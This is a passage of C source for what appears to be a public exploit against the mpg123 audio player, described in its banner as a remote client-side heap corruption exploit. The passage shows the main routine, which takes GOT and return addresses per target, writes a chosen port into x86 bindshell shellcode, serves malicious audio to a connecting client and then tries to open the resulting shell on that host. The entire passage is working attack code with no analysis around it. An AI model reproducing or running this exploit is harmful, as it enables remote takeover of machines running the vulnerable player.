getshell(hostname,26112); exit(0); }
/* start of operations. */ int main(int argc,char **argv){ unsigned int i=0; int chr=0; char *hostptr, *nameptr="none"; printf("[*] mpg123[v0.59r,v0.59s]: remote client-side heap corruption" " exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realh" "alo)\n\n"); while((chr=getopt(argc,argv,"p:s:g:r:+:t:l"))!=EOF){ switch(chr){ case 'p': port=atoi(optarg); break; case 's': sport=atoi(optarg); break; case 'g': sscanf(optarg,"%x",&gotaddr); break; case 'r': sscanf(optarg,"%x",&requestaddr); break; case '+': retoffset=(atoi(optarg)*4); break; case 't': i=0; while(target[i].p_name)i++; if(atoi(optarg)>=i) printf("[!] %u is not a valid target, ignored.\n",atoi(optarg)); else{ nameptr=target[atoi(optarg)].p_name; gotaddr=target[atoi(optarg)].p_gotaddr; requestaddr=target[atoi(optarg)].p_requestaddr; retoffset=(target[atoi(optarg)].p_retoffset*4); } break; case 'l': platform_list(); break; default: usage(argv[0]); break; } } if(!port)usage(argv[0]); /* verbose display. */ printf("[*] platform value base\t\t: %s.\n",nameptr); printf("[*] fprintf GOT address\t\t: 0x%.8x.\n",gotaddr); printf("[*] *request address location\t: 0x%.8x.\n",requestaddr); printf("[*] *request offset(+?*4)\t: %u(=%u), ret=0x%.8x.\n\n", (retoffset/4),retoffset,(requestaddr+retoffset)); /* set the bindshell port in the shellcode(byte 33/34). */ x86_exec[33]=(sport&0xff00)>>8; x86_exec[34]=(sport&0x00ff); /* audioserver_bind() returns the host that connected to it. */ hostptr=audioserver_bind(); /* check the host for success, see if the bindshell is listening. */ getshell(hostptr); printf("[!] exploit failed.\n"); exit(0); }